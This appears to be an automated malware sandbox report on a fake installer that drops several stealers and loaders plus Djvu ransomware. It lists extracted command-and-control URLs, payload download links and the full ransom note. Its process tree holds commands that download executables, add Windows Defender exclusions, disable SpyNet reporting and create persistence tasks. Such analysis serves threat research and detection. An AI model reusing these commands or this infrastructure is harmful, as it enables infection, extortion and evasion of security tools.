Resubmissions

28-03-2022 07:58

220328-jty77adcdp 10

25-03-2022 09:29

220325-lf232adhh3 1

25-03-2022 09:16

220325-k8tfxsaddl 10

24-03-2022 20:10

220324-yx6trsdgg5 1

21-03-2022 09:00

220321-kyfgbaafh9 10

21-03-2022 08:57

220321-kw1dpsafg5 4

20-03-2022 10:09

220320-l64pjscaen 10

19-03-2022 11:38

220319-nr4gcaghhr 10

Analysis

  • max time kernel
    271s
  • max time network
    384s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-en-20220113
  • submitted
    17-03-2022 18:18

General

  • Target

    setup_x86_x64_install.exe

  • Size

    6.2MB

  • MD5

    d2f0cfac1c354f041c7b243f3df94d0a

  • SHA1

    dfc03d06e799018485dc2dd72f997a0fef3d83a1

  • SHA256

    3faadb2356253a3c76b42691c13dd3c05b0df75fbf543041bd7afc478b9a838c

  • SHA512

    ed4b434001a16e0d81d59a5be9a26d31be8fb518ddc9e98dd22ca031761ab88ec9d4d479f11b2c0febfb90960061159836c806952d9e0c5cf9239654a5b7e6d6

Malware Config

Extracted

Family

socelars

C2

http://www.iyiqian.com/

http://www.xxhufdc.top/

http://www.uefhkice.xyz/

http://www.fcektsy.top/

Extracted

Family

vidar

Version

40.6

Botnet

706

C2

https://dimonbk83.tumblr.com/

Attributes
  • profile_id

    706

Extracted

Family

redline

Botnet

ANI

C2

45.142.215.47:27643

Extracted

Family

smokeloader

Version

2020

C2

http://varmisende.com/upload/

http://fernandomayol.com/upload/

http://nextlytm.com/upload/

http://people4jan.com/upload/

http://asfaltwerk.com/upload/

rc4.i32
rc4.i32

Extracted

Family

djvu

C2

http://fuyt.org/test3/get.php

Attributes
  • extension

    .xcbg

  • offline_id

    y6oQcfhmSRc7ZQ1q8yjLE3LhY8kK7FHg6LLlEht1

  • payload_url

    http://zerit.top/dl/build2.exe

    http://fuyt.org/files/1/build3.exe

  • ransomnote

    ATTENTION! Don't worry, you can return all your files! All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key. The only method of recovering files is to purchase decrypt tool and unique key for you. This software will decrypt all your encrypted files. What guarantees you have? You can send one of your encrypted file from your PC and we decrypt it for free. But we can decrypt only 1 file for free. File must not contain valuable information. You can get and look video overview decrypt tool: https://we.tl/t-zHDj26n4NW Price of private key and decrypt software is $980. Discount 50% available if you contact us first 72 hours, that's price for you is $490. Please note that you'll never restore your data without payment. Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours. To get this software you need write on our e-mail: support@sysmail.ch Reserve e-mail address to contact us: supportsys@airmail.cc Your personal ID: 0417Jsfkjn

rsa_pubkey.plain

Signatures

  • Detected Djvu ransomware 3 IoCs
  • Djvu Ransomware

    Ransomware which is a variant of the STOP family.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • OnlyLogger

    A tiny loader that uses IPLogger to get its payload.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • RedLine 1 IoCs
  • RedLine Payload 5 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Socelars 2 IoCs
  • Socelars Payload 2 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Vidar 2 IoCs
  • suricata: ET MALWARE EXE Download Request To Wordpress Folder Likely Malicious

    suricata: ET MALWARE EXE Download Request To Wordpress Folder Likely Malicious

  • suricata: ET MALWARE GCleaner Downloader Activity M5

    suricata: ET MALWARE GCleaner Downloader Activity M5

  • suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)

    suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)

  • suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt) M2

    suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt) M2

  • suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (passwords.txt) M2

    suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (passwords.txt) M2

  • suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

    suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

  • suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload

    suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload

  • suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer HTTP POST Pattern

    suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer HTTP POST Pattern

  • suricata: ET MALWARE Win32.Raccoon Stealer - Telegram Mirror Checkin (generic)

    suricata: ET MALWARE Win32.Raccoon Stealer - Telegram Mirror Checkin (generic)

  • suricata: ET MALWARE Win32/Spy.Socelars.S CnC Activity M3

    suricata: ET MALWARE Win32/Spy.Socelars.S CnC Activity M3

  • suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2

    suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2

  • Djvu 3 IoCs
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • OnlyLogger Payload 2 IoCs
  • Smokeloader2018 1 IoCs
  • Vidar Stealer 2 IoCs
  • ASPack v2.12-2.42 6 IoCs

    Detects executables packed with ASPack v2.12-2.42

  • Blocklisted process makes network request 3 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 64 IoCs
  • VMProtect packed file 3 IoCs

    Detects executables packed with VMProtect commercial packer.

  • Checks BIOS information in registry 2 TTPs 4 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 24 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 40 IoCs
  • Obfuscated with Agile.Net obfuscator 3 IoCs

    Detects use of the Agile.Net commercial obfuscator, which is capable of entity renaming and control flow obfuscation.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 3 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 10 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Looks up geolocation information via web service

    Uses a legitimate geolocation service to find the infected system's geolocation info.

  • Drops file in System32 directory 7 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 13 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • Drops file in Program Files directory 5 IoCs
  • Drops file in Windows directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 50 IoCs
  • Checks SCSI registry key(s) 3 TTPs 12 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 30 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 14 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 2 IoCs
  • Enumerates processes with tasklist 1 TTPs 4 IoCs
  • Enumerates system info in registry 2 TTPs 4 IoCs
  • Kills process with taskkill 4 IoCs
  • Modifies Internet Explorer settings 1 TTPs 4 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 1 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Script User-Agent 1 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 4 IoCs
  • Suspicious behavior: MapViewOfSection 21 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: GetForegroundWindowSpam
    • Suspicious behavior: MapViewOfSection
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    PID:3020
    • C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe
      "C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"
      2⤵
      • Checks computer location settings
      • Suspicious use of WriteProcessMemory
      PID:1420
      • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
        "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
        3⤵
        • Executes dropped EXE
        • Checks computer location settings
        • Suspicious use of WriteProcessMemory
        PID:2368
        • C:\Users\Admin\AppData\Local\Temp\7zS049B1F6D\setup_install.exe
          "C:\Users\Admin\AppData\Local\Temp\7zS049B1F6D\setup_install.exe"
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Suspicious use of WriteProcessMemory
          PID:2088
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c Tue02976fcdf1.exe
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:2032
            • C:\Users\Admin\AppData\Local\Temp\7zS049B1F6D\Tue02976fcdf1.exe
              Tue02976fcdf1.exe
              6⤵
              • Executes dropped EXE
              • Suspicious use of AdjustPrivilegeToken
              PID:1632
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c Tue0289c99651.exe
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:1348
            • C:\Users\Admin\AppData\Local\Temp\7zS049B1F6D\Tue0289c99651.exe
              Tue0289c99651.exe
              6⤵
              • Executes dropped EXE
              PID:3888
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c Tue029560e6534e190c.exe
            5⤵
              PID:2120
              • C:\Users\Admin\AppData\Local\Temp\7zS049B1F6D\Tue029560e6534e190c.exe
                Tue029560e6534e190c.exe
                6⤵
                • Executes dropped EXE
                • Modifies system certificate store
                PID:1828
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 1828 -s 1780
                  7⤵
                  • Program crash
                  PID:1932
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c Tue026e182673.exe /mixone
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:3296
              • C:\Users\Admin\AppData\Local\Temp\7zS049B1F6D\Tue026e182673.exe
                Tue026e182673.exe /mixone
                6⤵
                • Executes dropped EXE
                • Suspicious behavior: GetForegroundWindowSpam
                PID:3624
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 3624 -s 456
                  7⤵
                  • Program crash
                  PID:5020
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 3624 -s 656
                  7⤵
                  • Program crash
                  PID:4468
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 3624 -s 748
                  7⤵
                  • Program crash
                  PID:4664
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 3624 -s 788
                  7⤵
                  • Program crash
                  PID:4300
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 3624 -s 668
                  7⤵
                  • Program crash
                  PID:3532
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 3624 -s 876
                  7⤵
                  • Program crash
                  PID:3404
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 3624 -s 1052
                  7⤵
                  • Program crash
                  PID:3628
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 3624 -s 1120
                  7⤵
                  • Program crash
                  PID:3004
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 3624 -s 1292
                  7⤵
                  • Program crash
                  PID:2280
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 3624 -s 780
                  7⤵
                  • Program crash
                  PID:5724
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 3624 -s 628
                  7⤵
                  • Program crash
                  PID:1544
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 3624 -s 1260
                  7⤵
                  • Program crash
                  PID:5040
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 3624 -s 756
                  7⤵
                  • Program crash
                  PID:2020
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c Tue02b2110095fe706.exe
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:1472
              • C:\Users\Admin\AppData\Local\Temp\7zS049B1F6D\Tue02b2110095fe706.exe
                Tue02b2110095fe706.exe
                6⤵
                • Executes dropped EXE
                PID:3932
                • C:\Users\Admin\AppData\Local\Temp\is-B64KF.tmp\Tue02b2110095fe706.tmp
                  "C:\Users\Admin\AppData\Local\Temp\is-B64KF.tmp\Tue02b2110095fe706.tmp" /SL5="$7004E,506086,422400,C:\Users\Admin\AppData\Local\Temp\7zS049B1F6D\Tue02b2110095fe706.exe"
                  7⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  PID:4284
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c Tue02705f9c2b455.exe
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:884
              • C:\Users\Admin\AppData\Local\Temp\7zS049B1F6D\Tue02705f9c2b455.exe
                Tue02705f9c2b455.exe
                6⤵
                • Executes dropped EXE
                PID:3120
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c Tue026e94a5005f8.exe
              5⤵
                PID:760
                • C:\Users\Admin\AppData\Local\Temp\7zS049B1F6D\Tue026e94a5005f8.exe
                  Tue026e94a5005f8.exe
                  6⤵
                  • Executes dropped EXE
                  • Suspicious use of SetThreadContext
                  PID:2188
                  • C:\Users\Admin\AppData\Local\Temp\7zS049B1F6D\Tue026e94a5005f8.exe
                    C:\Users\Admin\AppData\Local\Temp\7zS049B1F6D\Tue026e94a5005f8.exe
                    7⤵
                    • Executes dropped EXE
                    PID:4696
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c Tue02dc626f48.exe
                5⤵
                • Suspicious use of WriteProcessMemory
                PID:1336
                • C:\Users\Admin\AppData\Local\Temp\7zS049B1F6D\Tue02dc626f48.exe
                  Tue02dc626f48.exe
                  6⤵
                  • Executes dropped EXE
                  • Suspicious use of AdjustPrivilegeToken
                  PID:3004
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd.exe /c taskkill /f /im chrome.exe
                    7⤵
                      PID:4652
                      • C:\Windows\SysWOW64\taskkill.exe
                        taskkill /f /im chrome.exe
                        8⤵
                        • Kills process with taskkill
                        • Suspicious use of AdjustPrivilegeToken
                        PID:4792
                • C:\Windows\SysWOW64\cmd.exe
                  C:\Windows\system32\cmd.exe /c Tue02520f255d0ba43a.exe
                  5⤵
                    PID:4092
                    • C:\Users\Admin\AppData\Local\Temp\7zS049B1F6D\Tue02520f255d0ba43a.exe
                      Tue02520f255d0ba43a.exe
                      6⤵
                      • Executes dropped EXE
                      PID:4264
                      • C:\Users\Admin\Pictures\Adobe Films\t2y2IyXDHgdSnEi_aVjgEuJo.exe
                        "C:\Users\Admin\Pictures\Adobe Films\t2y2IyXDHgdSnEi_aVjgEuJo.exe"
                        7⤵
                        • Executes dropped EXE
                        PID:4424
                      • C:\Users\Admin\Pictures\Adobe Films\HiBTZE6Gv4KxjmirFmay03bJ.exe
                        "C:\Users\Admin\Pictures\Adobe Films\HiBTZE6Gv4KxjmirFmay03bJ.exe"
                        7⤵
                        • Executes dropped EXE
                        • Checks computer location settings
                        PID:2396
                        • C:\Windows\system32\cmd.exe
                          "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\37A3.tmp\3A82.tmp\3A83.bat "C:\Users\Admin\Pictures\Adobe Films\HiBTZE6Gv4KxjmirFmay03bJ.exe""
                          8⤵
                            PID:1580
                            • C:\Users\Admin\AppData\Local\Temp\37A3.tmp\3A82.tmp\extd.exe
                              C:\Users\Admin\AppData\Local\Temp\37A3.tmp\3A82.tmp\extd.exe "/hideself" "" "" "" "" "" "" "" ""
                              9⤵
                                PID:5008
                              • C:\Users\Admin\AppData\Local\Temp\37A3.tmp\3A82.tmp\extd.exe
                                C:\Users\Admin\AppData\Local\Temp\37A3.tmp\3A82.tmp\extd.exe "/download" "http://file-coin-coin-10.com/files/4460_1647529798_1063.exe" "4460_1647529798_1063.exe" "" "" "" "" "" ""
                                9⤵
                                • Executes dropped EXE
                                PID:5012
                              • C:\Users\Admin\AppData\Local\Temp\37A3.tmp\3A82.tmp\extd.exe
                                C:\Users\Admin\AppData\Local\Temp\37A3.tmp\3A82.tmp\extd.exe "/download" "http://file-coin-coin-10.com/files/1245_1647445154_9529.exe" "1245_1647445154_9529.exe" "" "" "" "" "" ""
                                9⤵
                                • Executes dropped EXE
                                PID:3404
                              • C:\Users\Admin\AppData\Local\Temp\1348\4460_1647529798_1063.exe
                                4460_1647529798_1063.exe
                                9⤵
                                • Executes dropped EXE
                                PID:5236
                              • C:\Users\Admin\AppData\Local\Temp\1348\1245_1647445154_9529.exe
                                1245_1647445154_9529.exe
                                9⤵
                                • Executes dropped EXE
                                PID:5648
                              • C:\Users\Admin\AppData\Local\Temp\37A3.tmp\3A82.tmp\extd.exe
                                C:\Users\Admin\AppData\Local\Temp\37A3.tmp\3A82.tmp\extd.exe "" "" "" "" "" "" "" "" ""
                                9⤵
                                  PID:1576
                            • C:\Users\Admin\Pictures\Adobe Films\6zYhJZFz7hGRxH5AOfPbfb1q.exe
                              "C:\Users\Admin\Pictures\Adobe Films\6zYhJZFz7hGRxH5AOfPbfb1q.exe"
                              7⤵
                              • Executes dropped EXE
                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                              PID:4216
                            • C:\Users\Admin\Pictures\Adobe Films\OWJw6KtR2NwUoYenThY2ECt7.exe
                              "C:\Users\Admin\Pictures\Adobe Films\OWJw6KtR2NwUoYenThY2ECt7.exe"
                              7⤵
                              • Executes dropped EXE
                              • Checks computer location settings
                              • Loads dropped DLL
                              • Suspicious use of SetThreadContext
                              PID:1176
                              • C:\Windows\SysWOW64\cmd.exe
                                "C:\Windows\System32\cmd.exe" /c timeout 35
                                8⤵
                                  PID:3108
                                  • C:\Windows\SysWOW64\timeout.exe
                                    timeout 35
                                    9⤵
                                    • Delays execution with timeout.exe
                                    PID:3236
                                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                  C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                  8⤵
                                    PID:5972
                                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                    C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                    8⤵
                                      PID:6012
                                  • C:\Users\Admin\Pictures\Adobe Films\4B3of8v9JlXMrHyDZ8ywGtP7.exe
                                    "C:\Users\Admin\Pictures\Adobe Films\4B3of8v9JlXMrHyDZ8ywGtP7.exe"
                                    7⤵
                                    • Executes dropped EXE
                                    • Checks computer location settings
                                    PID:4828
                                    • C:\Windows\SysWOW64\WerFault.exe
                                      C:\Windows\SysWOW64\WerFault.exe -u -p 4828 -s 624
                                      8⤵
                                      • Program crash
                                      PID:3236
                                    • C:\Windows\SysWOW64\WerFault.exe
                                      C:\Windows\SysWOW64\WerFault.exe -u -p 4828 -s 660
                                      8⤵
                                      • Program crash
                                      PID:3868
                                    • C:\Windows\SysWOW64\WerFault.exe
                                      C:\Windows\SysWOW64\WerFault.exe -u -p 4828 -s 668
                                      8⤵
                                      • Program crash
                                      PID:3328
                                    • C:\Windows\SysWOW64\WerFault.exe
                                      C:\Windows\SysWOW64\WerFault.exe -u -p 4828 -s 824
                                      8⤵
                                      • Program crash
                                      PID:1784
                                    • C:\Windows\SysWOW64\WerFault.exe
                                      C:\Windows\SysWOW64\WerFault.exe -u -p 4828 -s 1224
                                      8⤵
                                      • Program crash
                                      PID:3420
                                    • C:\Windows\SysWOW64\WerFault.exe
                                      C:\Windows\SysWOW64\WerFault.exe -u -p 4828 -s 1236
                                      8⤵
                                      • Program crash
                                      PID:2984
                                    • C:\Windows\SysWOW64\WerFault.exe
                                      C:\Windows\SysWOW64\WerFault.exe -u -p 4828 -s 1132
                                      8⤵
                                      • Program crash
                                      PID:4392
                                    • C:\Windows\SysWOW64\cmd.exe
                                      "C:\Windows\System32\cmd.exe" /c taskkill /im "4B3of8v9JlXMrHyDZ8ywGtP7.exe" /f & erase "C:\Users\Admin\Pictures\Adobe Films\4B3of8v9JlXMrHyDZ8ywGtP7.exe" & exit
                                      8⤵
                                        PID:3968
                                        • C:\Windows\SysWOW64\taskkill.exe
                                          taskkill /im "4B3of8v9JlXMrHyDZ8ywGtP7.exe" /f
                                          9⤵
                                          • Kills process with taskkill
                                          PID:2844
                                      • C:\Windows\SysWOW64\WerFault.exe
                                        C:\Windows\SysWOW64\WerFault.exe -u -p 4828 -s 1444
                                        8⤵
                                        • Program crash
                                        PID:5816
                                    • C:\Users\Admin\Pictures\Adobe Films\PhsHMlF6tpL4cItkeiIXvtL7.exe
                                      "C:\Users\Admin\Pictures\Adobe Films\PhsHMlF6tpL4cItkeiIXvtL7.exe"
                                      7⤵
                                      • Executes dropped EXE
                                      • Checks computer location settings
                                      • Drops file in Program Files directory
                                      PID:4704
                                      • C:\Windows\SysWOW64\schtasks.exe
                                        schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
                                        8⤵
                                        • Creates scheduled task(s)
                                        PID:5096
                                      • C:\Windows\SysWOW64\schtasks.exe
                                        schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
                                        8⤵
                                        • Creates scheduled task(s)
                                        PID:2716
                                      • C:\Users\Admin\Documents\iyYRA2zjB7qX2F6ikmR6SV3S.exe
                                        "C:\Users\Admin\Documents\iyYRA2zjB7qX2F6ikmR6SV3S.exe"
                                        8⤵
                                        • Executes dropped EXE
                                        • Checks computer location settings
                                        PID:3100
                                        • C:\Users\Admin\Pictures\Adobe Films\bt6RuJUGA2_XYKNjgPQ5G4KD.exe
                                          "C:\Users\Admin\Pictures\Adobe Films\bt6RuJUGA2_XYKNjgPQ5G4KD.exe"
                                          9⤵
                                          • Executes dropped EXE
                                          PID:5052
                                        • C:\Users\Admin\Pictures\Adobe Films\gsqNVzo3JRFSA0n3M3dgMnUr.exe
                                          "C:\Users\Admin\Pictures\Adobe Films\gsqNVzo3JRFSA0n3M3dgMnUr.exe"
                                          9⤵
                                          • Executes dropped EXE
                                          PID:4296
                                          • C:\Windows\SysWOW64\WerFault.exe
                                            C:\Windows\SysWOW64\WerFault.exe -u -p 4296 -s 580
                                            10⤵
                                            • Program crash
                                            PID:4088
                                          • C:\Windows\SysWOW64\WerFault.exe
                                            C:\Windows\SysWOW64\WerFault.exe -u -p 4296 -s 624
                                            10⤵
                                            • Program crash
                                            PID:4976
                                          • C:\Windows\SysWOW64\WerFault.exe
                                            C:\Windows\SysWOW64\WerFault.exe -u -p 4296 -s 652
                                            10⤵
                                            • Program crash
                                            PID:5588
                                          • C:\Windows\SysWOW64\WerFault.exe
                                            C:\Windows\SysWOW64\WerFault.exe -u -p 4296 -s 740
                                            10⤵
                                            • Program crash
                                            PID:5468
                                          • C:\Windows\SysWOW64\WerFault.exe
                                            C:\Windows\SysWOW64\WerFault.exe -u -p 4296 -s 788
                                            10⤵
                                            • Executes dropped EXE
                                            • Checks BIOS information in registry
                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                            • Program crash
                                            • Checks SCSI registry key(s)
                                            • Suspicious behavior: MapViewOfSection
                                            PID:1708
                                          • C:\Windows\SysWOW64\WerFault.exe
                                            C:\Windows\SysWOW64\WerFault.exe -u -p 4296 -s 732
                                            10⤵
                                            • Program crash
                                            PID:5656
                                        • C:\Users\Admin\Pictures\Adobe Films\6AMZrD3zpEI3XVpw_LFdRZFT.exe
                                          "C:\Users\Admin\Pictures\Adobe Films\6AMZrD3zpEI3XVpw_LFdRZFT.exe"
                                          9⤵
                                          • Executes dropped EXE
                                          • Checks computer location settings
                                          PID:1172
                                          • C:\Windows\SysWOW64\control.exe
                                            "C:\Windows\System32\control.exe" .\a6U_WGm.9B
                                            10⤵
                                              PID:428
                                              • C:\Windows\SysWOW64\rundll32.exe
                                                "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\a6U_WGm.9B
                                                11⤵
                                                • Loads dropped DLL
                                                PID:5156
                                                • C:\Windows\system32\RunDll32.exe
                                                  C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL .\a6U_WGm.9B
                                                  12⤵
                                                    PID:4980
                                                    • C:\Windows\SysWOW64\rundll32.exe
                                                      "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 .\a6U_WGm.9B
                                                      13⤵
                                                      • Loads dropped DLL
                                                      PID:4456
                                            • C:\Users\Admin\Pictures\Adobe Films\nXFeAbvXLg7Hi4X0yNObClwf.exe
                                              "C:\Users\Admin\Pictures\Adobe Films\nXFeAbvXLg7Hi4X0yNObClwf.exe"
                                              9⤵
                                              • Executes dropped EXE
                                              PID:5008
                                              • C:\Windows\SysWOW64\cmd.exe
                                                cmd.exe /c taskkill /f /im chrome.exe
                                                10⤵
                                                  PID:4292
                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                    taskkill /f /im chrome.exe
                                                    11⤵
                                                    • Kills process with taskkill
                                                    PID:4116
                                              • C:\Users\Admin\Pictures\Adobe Films\43iKPl1AdRKm4gLJtv_LcXoy.exe
                                                "C:\Users\Admin\Pictures\Adobe Films\43iKPl1AdRKm4gLJtv_LcXoy.exe"
                                                9⤵
                                                • Executes dropped EXE
                                                PID:3132
                                                • C:\Users\Admin\AppData\Local\Temp\7zSBC53.tmp\Install.exe
                                                  .\Install.exe
                                                  10⤵
                                                  • Executes dropped EXE
                                                  PID:4304
                                                  • C:\Users\Admin\AppData\Local\Temp\7zSD55A.tmp\Install.exe
                                                    .\Install.exe /S /site_id "525403"
                                                    11⤵
                                                    • Executes dropped EXE
                                                    • Checks BIOS information in registry
                                                    • Checks computer location settings
                                                    • Drops file in System32 directory
                                                    • Enumerates system info in registry
                                                    PID:1400
                                                    • C:\Windows\SysWOW64\forfiles.exe
                                                      "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
                                                      12⤵
                                                        PID:5324
                                                        • C:\Windows\System32\Conhost.exe
                                                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          13⤵
                                                            PID:3556
                                                          • C:\Windows\SysWOW64\cmd.exe
                                                            /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
                                                            13⤵
                                                              PID:4648
                                                              • \??\c:\windows\SysWOW64\reg.exe
                                                                REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
                                                                14⤵
                                                                  PID:1580
                                                                • \??\c:\windows\SysWOW64\reg.exe
                                                                  REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
                                                                  14⤵
                                                                    PID:2512
                                                              • C:\Windows\SysWOW64\forfiles.exe
                                                                "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
                                                                12⤵
                                                                  PID:6068
                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                    /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
                                                                    13⤵
                                                                      PID:5296
                                                                      • \??\c:\windows\SysWOW64\reg.exe
                                                                        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
                                                                        14⤵
